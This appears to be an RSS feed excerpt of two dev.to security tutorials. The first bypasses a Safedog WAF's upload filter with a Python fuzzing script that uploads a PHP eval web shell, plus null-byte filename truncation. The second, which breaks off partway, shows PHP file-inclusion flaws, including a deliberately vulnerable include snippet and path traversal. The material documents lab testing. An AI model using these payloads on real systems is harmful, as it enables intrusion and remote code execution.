&lt;li&gt;Database: MySQL 5.5&lt;/li&gt;
&lt;li&gt;Web script: PHP 5.4.19&lt;/li&gt;
&lt;li&gt;WAF: Safedog for Apache v4.0.3025&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;During testing, only the upload protection module of Safedog was enabled; otherwise, other modules could delete files from the target environment due to false positives.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwrwjckbl4253ov183s3l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwrwjckbl4253ov183s3l.png" alt=" " width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Practical Case 1 – Writing a Fuzzing Script to Exploit Data Overflow
&lt;/h3&gt;

&lt;p&gt;Given that the boundary string can accommodate a large volume of junk data, a fuzzing script was written to test whether the WAF could be bypassed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;#! /usr/bin/env python
# _*_  coding:utf-8 _*_
&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;

&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://hackrock.com:813/Pass-01/index.php&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;generate_random_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;randomlength&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;random_str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;''&lt;/span&gt;
    &lt;span class="n"&gt;base_str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;
    &lt;span class="n"&gt;length&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;base_str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;randomlength&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;random_str&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;base_str&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;randint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;random_str&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;8000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;stri&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;generate_random_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

        &lt;span class="n"&gt;headers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Host&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hackrock.com:813&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;User-Agent&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Referer&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://hackrock.com:813/Pass-01/index.php&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Content-Type&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;multipart/form-data; boundary=----&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;stri&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
            ------&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;stri&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
            Content-Disposition: form-data; name=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;upload_file&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;; filename=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;shell.php&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;
            Content-Type: image/png

            &amp;lt;?php @eval($_POST[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;hack&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;]); ?&amp;gt;

            ------&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;stri&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
            Content-Disposition: form-data; name=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;submit&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;

            上传
            ------&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;stri&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;--

        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

        &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;headers&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;headers&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="n"&gt;stri&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
        &lt;span class="c1"&gt;#print payload
&lt;/span&gt;        &lt;span class="c1"&gt;#print headers
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;count&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;上传&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Length is : %s &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The script was written using Python 2.7; ensure a Python 2 environment and the required libraries are installed.&lt;/p&gt;

&lt;p&gt;The test result indicated that a boundary length of 3710 characters was effective:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjvutvjl25sixaks9ci0f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjvutvjl25sixaks9ci0f.png" alt=" " width="799" height="376"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Although the file was not actually uploaded to the server (due to the target environment’s restriction), the Safedog WAF was successfully bypassed.&lt;/p&gt;

&lt;p&gt;The crafted packet was then sent via Burp Suite:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzag2rdb4ew9mcf3rkfx7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzag2rdb4ew9mcf3rkfx7.png" alt=" " width="800" height="418"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The bypass was achieved.&lt;/p&gt;

&lt;h3&gt;
  
  
  Practical Case 2 – Bypassing Using Null Byte Truncation
&lt;/h3&gt;

&lt;p&gt;The file was uploaded while intercepting with Burp Suite, and the &lt;code&gt;filename&lt;/code&gt; value was changed to: &lt;code&gt;shell.php;.jpg&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wh8n3buawxi169el5yz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wh8n3buawxi169el5yz.png" alt=" " width="797" height="90"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The hex view was then opened (the semicolon’s hexadecimal value is &lt;code&gt;0x3b&lt;/code&gt;), and &lt;code&gt;3b&lt;/code&gt; was altered to &lt;code&gt;00&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwnorizf464pzhszhla8q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwnorizf464pzhszhla8q.png" alt=" " width="800" height="517"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The packet was sent.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fse88tmugeopton4xrf5d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fse88tmugeopton4xrf5d.png" alt=" " width="799" height="373"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The bypass was successful.&lt;/p&gt;

</description>
      <category>firewall</category>
      <category>cybersecurity</category>
      <category>vulnerabilities</category>
      <category>waf</category>
    </item>
    <item>
      <title>Different ways to get a shell using PHP file inclusion vulnerabilities</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Mon, 08 Jun 2026 01:16:52 +0000</pubDate>
      <link>https://dev.to/excalibra/different-ways-to-get-a-shell-using-php-file-inclusion-vulnerabilities-11n2</link>
      <guid>https://dev.to/excalibra/different-ways-to-get-a-shell-using-php-file-inclusion-vulnerabilities-11n2</guid>
      <description>&lt;h2&gt;
  
  
  Related Functions
&lt;/h2&gt;

&lt;p&gt;The following four functions in PHP are typically responsible for file inclusion vulnerabilities:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;a href="http://www.php.net/manual/en/function.include.php" rel="noopener noreferrer"&gt;&lt;code&gt;include()&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://php.net/manual/en/function.include-once.php" rel="noopener noreferrer"&gt;&lt;code&gt;include_once()&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://php.net/manual/en/function.require.php" rel="noopener noreferrer"&gt;&lt;code&gt;require()&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://php.net/manual/en/function.require-once.php" rel="noopener noreferrer"&gt;&lt;code&gt;require_once()&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If an error occurs during inclusion with &lt;code&gt;require()&lt;/code&gt; (e.g., the file does not exist), execution will halt immediately, and subsequent statements will not be executed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fod3vli5550j5aw03mm7z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fod3vli5550j5aw03mm7z.png" alt=" " width="800" height="188"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If an error occurs with &lt;code&gt;include()&lt;/code&gt;, only a warning is issued, and execution continues with subsequent statements.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjak8aggh7a5itydqcs04.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjak8aggh7a5itydqcs04.png" alt=" " width="799" height="200"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;require_once()&lt;/code&gt; and &lt;code&gt;include_once()&lt;/code&gt; behave similarly to &lt;code&gt;require()&lt;/code&gt; and &lt;code&gt;include()&lt;/code&gt;, respectively. If a file has already been included, &lt;code&gt;require_once()&lt;/code&gt; and &lt;code&gt;include_once()&lt;/code&gt; will not include it again, thereby avoiding issues such as function redefinition or variable reassignment.&lt;/p&gt;

&lt;p&gt;When these four functions are used to include files, regardless of the file type (e.g., image, text file), the file is parsed directly as PHP. Test code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the same directory, there is a file named &lt;code&gt;phpinfo.txt&lt;/code&gt; with the following content: &lt;code&gt;&amp;lt;?php phpinfo(); ?&amp;gt;&lt;/code&gt;. Simply visit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;phpinfo.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will successfully execute &lt;code&gt;phpinfo()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg64mvr1un3k0uj65jhdh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg64mvr1un3k0uj65jhdh.png" alt=" " width="800" height="192"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Scenario
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;The application uses one of the relevant file inclusion functions.&lt;/li&gt;
&lt;li&gt;The file inclusion function uses a dynamic variable, e.g., &lt;code&gt;include $file;&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;An attacker can control that variable, e.g., &lt;code&gt;$file = $_GET['file'];&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Classification
&lt;/h3&gt;

&lt;h4&gt;
  
  
  LFI (Local File Inclusion)
&lt;/h4&gt;

&lt;p&gt;Local File Inclusion (LFI) refers to vulnerabilities that allow an attacker to include and execute local files. In most cases, encountered file inclusion vulnerabilities are LFI.&lt;/p&gt;

&lt;p&gt;This type of vulnerability is not affected by the &lt;code&gt;allow_url_fopen&lt;/code&gt; or &lt;code&gt;allow_url_include&lt;/code&gt; settings. For example, setting both to &lt;code&gt;Off&lt;/code&gt; in &lt;code&gt;php.ini&lt;/code&gt; and restarting the server:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" alt=" " width="800" height="215"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Visiting &lt;code&gt;?page=../../../phpinfo.php&lt;/code&gt; still successfully parses &lt;code&gt;phpinfo()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6diwtlt5s815vlhztg1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6diwtlt5s815vlhztg1.png" alt=" " width="800" height="224"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  RFI (Remote File Inclusion)
&lt;/h4&gt;

&lt;p&gt;Remote File Inclusion (RFI) allows an attacker to include and execute files from a remote server. Since the remote file is under the attacker's control, this vulnerability can be extremely harmful. However, RFI has stricter prerequisites, requiring the following &lt;code&gt;php.ini&lt;/code&gt; configurations:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;code&gt;allow_url_fopen = On&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;allow_url_include = On&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Both must be &lt;code&gt;On&lt;/code&gt; for remote file inclusion to succeed. For example, setting both to &lt;code&gt;Off&lt;/code&gt; and restarting the server:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" alt=" " width="800" height="215"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Visiting &lt;code&gt;?page=http://192.168.1.4&lt;/code&gt; will produce errors:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;
&lt;span class="nc"&gt;Warning&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="k"&gt;include&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="o"&gt;://&lt;/span&gt; &lt;span class="n"&gt;wrapper&lt;/span&gt; &lt;span class="n"&gt;is&lt;/span&gt; &lt;span class="n"&gt;disabled&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;server&lt;/span&gt; &lt;span class="n"&gt;configuration&lt;/span&gt; &lt;span class="n"&gt;by&lt;/span&gt; &lt;span class="n"&gt;allow_url_fopen&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt; &lt;span class="nc"&gt;D&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="n"&gt;\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\fi\index&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt; &lt;span class="n"&gt;on&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="mi"&gt;36&lt;/span&gt;

&lt;span class="nc"&gt;Warning&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="k"&gt;include&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="o"&gt;://&lt;/span&gt;&lt;span class="mf"&gt;192.168.1.4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;failed&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;open&lt;/span&gt; &lt;span class="n"&gt;stream&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;no&lt;/span&gt; &lt;span class="n"&gt;suitable&lt;/span&gt; &lt;span class="n"&gt;wrapper&lt;/span&gt; &lt;span class="n"&gt;could&lt;/span&gt; &lt;span class="n"&gt;be&lt;/span&gt; &lt;span class="n"&gt;found&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt; &lt;span class="nc"&gt;D&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="n"&gt;\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\fi\index&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt; &lt;span class="n"&gt;on&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="mi"&gt;36&lt;/span&gt;

